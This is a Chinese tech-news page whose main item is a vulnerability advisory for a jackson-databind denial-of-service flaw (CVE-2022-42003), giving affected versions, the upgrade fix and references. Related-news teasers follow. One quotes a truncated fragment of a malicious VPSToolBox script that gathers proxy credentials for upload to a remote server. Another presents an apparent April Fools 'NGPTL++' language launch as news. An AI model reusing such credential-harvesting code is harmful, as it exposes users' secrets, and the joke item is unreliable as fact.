FasterXML jackson-databind是一个基于JAVA,可以将XML和JSON等数据格式与JAVA对象进行转换的库。
在小于2.14.0-rc1的版本中,当UNWRAP_SINGLE_VALUE_ARRAYS功能开启时,对于过深的数组嵌套json,缺乏校验直接反序列化,会导致消耗大量系统资源,从而引起拒绝服务。
该漏洞已存在 POC。
FasterXML jackson-databind 小于2.14.0-rc1拒绝服务漏洞
com.fasterxml.jackson.core:jackson-databind@[2.0, 2.14.0-rc1)
升级com.fasterxml.jackson.core:jackson-databind到 2.14.0-rc1 或更高版本
https://www.oscs1024.com/hd/MPS-2022-58653
https://nvd.nist.gov/vuln/detail/CVE-2022-42003
https://github.com/FasterXML/jackson-databind/issues/3590
https://github.com/FasterXML/jackson-databind/commit/d78d00ee7b5245b93103fef3187f70543d67ca33
OSCS(开源软件供应链安全社区)通过最快、最全的方式,发布开源项目最新的安全风险动态,包括开源组件安全漏洞、事件等信息。同时提供漏洞、投毒情报的免费订阅服务,社区用户可通过配置飞书、钉钉、企业微信机器人,及时获得一手情报信息推送:
https://www.oscs1024.com/?src=osc
具体订阅方式详见:
https://www.oscs1024.com/docs/vuln-warning/intro/?src=osc
本站新闻禁止未经授权转载,违者依法追究相关法律责任。授权请联系:
oscbianji#oschina.cn
本文标题:
FasterXML jackson-databind 小于2.14.0-rc1拒绝服务漏洞
本文地址:
https://www.oschina.net/news/212461
资讯来源:
https://www.oscs1024.com/hd/MPS-2022-58653
3 月 31 日,当今世界最强科技狂人马斯克旗下的 NerveMind 公司基于 GPT-4 发布了一款名为 "NGPTL++" 的全新编程语言。根据文档介绍,这款编程语言具有革命性的特点,将彻底改变软件开发领域。 NGPTL 即 Next Generative Pre-trained Transformer Language,++ 则是致敬经典的 C++ 命名方式(inspired by gpt-4,并更上一...
V2EX (https://v2ex.com/t/928400) 用户发现 Trojan 一键脚本 VPSToolBox 包含恶意代码,会将用户自建的 Trojan 节点链接上传至远程服务器。
clean_env(){
prasejson
cd /root
echo "trojan://${password1}@${myip}:${trojanport}?security=tls&headerType=none&type=tcp&sni=${domain}#Trojan($(nproc --all)C$(g...
大型语言模型 (LLM) 的快速发展彻底改变了聊天机器人系统,从而实现了前所未有的智能水平,譬如 OpenAI 的 ChatGPT。但 ChatGPT 的训练和架构细节仍不清楚,阻碍了该领域的研究和开源创新。受 Meta LLaMA 和 Stanford Alpaca 项目的启发,来自加州大学伯克利分校、CMU、斯坦福大学和加州大学圣地亚哥分校的成员,共同推出...
curl 作者 Daniel Stenberg 在博客中宣布,以后将不再向各 Linux 发行版的邮件列表发送有关 cURL 安全漏洞的提前预告。 Daniel Stenberg 从 2011 年开始向发行版邮件列表(当时称为 linux-distros)发送有关"已发现但未解决"的 curl 安全漏洞的“预先通知”。通过提前通知各发行版,让他们可以抢先一步修复 curl 包。如此...
3月31日,国产操作系统开源社区OpenCloudOS正式发布首个全自研社区9.0版本(以下简称“OC9.0”)。据了解,该版本由腾讯等十余家企业共同开发并长期维护,其内核及用户态软件均为自主选型、独立演进,在操作系统发行版的全链路均实现自主可控。 操作系统等基础软件是信息技术的根基,也是亟需实现突破,掌握更多自主知识...
Qt 6.5 LTS 已正式发布。此版本为图形和 UI 开发者以及应用程序后端引入了许多新功能,还包含许多修复和通用的改进。Qt 6.5 将成为商业许可证持有者的长期支持 (LTS) 版本。 部分更新亮点: 改进主题和样式 使用 Qt 6.5,应用程序能够便捷地支持 Windows 的深色模式。 在 macOS 上,使用 QMessageBox 或 QErrorMessage ...
CircleCI 创始人 Paul Biggar 是 Darklang 编程语言的作者,近日他在一篇博客中宣布 Darklang 团队将全力投入 AI/GPT,Darklang 将被重构成一整套由 AI 驱动的基础设施,大部分代码都由 AI 生成。 Darklang 是一门 “deployless” 部署的编程语言(具有内置的基础结构)。严格来说,它是语言、编辑器和基础设施的混合体,...
在 2014 年,Google 以 4 亿英镑的价格收购了 DeepMind。这使得 DeepMind 成为了 Google 旗下的一个子公司,但它仍然保持着相对独立的运作方式。这也意味着 DeepMind 能够获得 Google 的技术和资源支持,同时也可以开展自己的研究和探索。 DeepMind 开发的 AlphaGo 在 2016 年击败围棋名将李世石,也让 DeepMind 一举成名...
中兴新支点操作系统正式开源了其桌面环境 —— 新支点超凡桌面环境 (EX-NDE)。其安装包大小仅 104M,轻量级的桌面环境占用更少的资源,优化了资源使用率,提升了整体的运行效率。 据介绍,新支点 EX-NDE 桌面环境分为两大主体:桌面组件和 NDE-Wayland 架构。 桌面组件:基于QT的自主研发,在保证轻量级的同时兼容性和易...
Touca 是一个开源测试工具,根据官方的介绍,Touca 可以帮助工程团队发现日常代码修改所导致的意外副作用。它将软件的行为和性能与之前的可信版本进行比较,并以近乎实时的方式将差异可视化。 日前,Touca 的创始人 Pejman Ghorbanzade 宣布,公司正式倒闭了: 在经历了两年令人难忘的时光后,我怀着复杂的心情与大家分享...
